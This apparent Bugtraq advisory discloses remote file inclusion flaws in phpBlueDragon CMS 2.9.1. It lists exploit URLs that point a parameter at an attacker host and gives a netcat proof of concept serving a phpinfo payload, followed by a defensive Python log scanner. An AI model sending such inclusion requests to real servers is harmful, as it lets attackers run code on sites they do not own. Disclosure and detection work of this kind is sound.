Date: 22 Jun 2006 07:35:09 -0000
From: rozowa.landrynka@...m.nation.pl
To: bugtraq@...urityfocus.com
Subject: phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln


PHPBlueDragon CMS <= 2.9.1 http://phpbluedragon.net/

Affected files:
    root_includes/root_modules/team_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
    root_includes/root_modules//rss_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
    root_includes/root_modules/manual_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
    root_includes/root_modules/forum_admin.php?action=group_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/
    root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/

Solution:

None

Simple PoC:

nc -l -p 9999
...
http://some.site/root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://192.168.0.xx:9999/
...
$ nc -l -p 9999
GET /public_includes/pub_kernel/pbd_move. HTTP/1.0
Host: 192.168.0.xx:9999

HTTP/0.9 200 OK

<?php phpinfo(); ?>
...
System 	OpenBSD xxx 3.9 xxx i386
... 

Credits:
shm 
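
A log check for the requests this advisory describes, added here as an example and not part of the original post: it flags requests to scripts under root_includes/root_modules/ whose vsDragonRootPath parameter carries a remote URL or stream wrapper. The Common Log Format input, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Common Log Format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jun/2006:07:40:01 +0000] "GET /root_includes/root_modules/'
    'forum_admin.php?action=forum_move&template_redirect=yes'
    '&vsDragonRootPath=http://198.51.100.7:9999/ HTTP/1.0" 200 512',
    '192.0.2.10 - - [22/Jun/2006:07:40:05 +0000] "GET /root_includes/root_modules//'
    'rss_admin.php?action=move_item&template_redirect=yes'
    '&vsDragonRootPath=http%3A%2F%2F198.51.100.7%2F HTTP/1.0" 200 512',
    '192.0.2.33 - - [22/Jun/2006:07:41:00 +0000] "GET /root_includes/root_modules/'
    'forum_admin.php?action=forum_move HTTP/1.1" 200 2048',
    '192.0.2.33 - - [22/Jun/2006:07:41:09 +0000] "GET /index.php?page=news HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that names a remote or wrapper resource: scheme://, data:, or //host.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|data:|//)', re.I)
PARAM = "vsDragonRootPath"                   # parameter named in the advisory
SCRIPT_DIR = "/root_includes/root_modules/"  # directory named in the advisory


def suspicious_value(line):
    """Return the remote-looking vsDragonRootPath value in a log line, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # Collapse duplicate slashes so "root_modules//rss_admin.php" still matches.
    path = re.sub(r"/+", "/", unquote(url.path))
    if SCRIPT_DIR not in path or not path.endswith(".php"):
        return None
    # parse_qsl percent-decodes names and values once, as the web server would.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == PARAM and REMOTE_RE.match(value):
            return value
    return None


def scan(lines):
    """Return (line_number, value) for every log line that matches."""
    return [(i, v) for i, l in enumerate(lines, 1) if (v := suspicious_value(l))]
```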

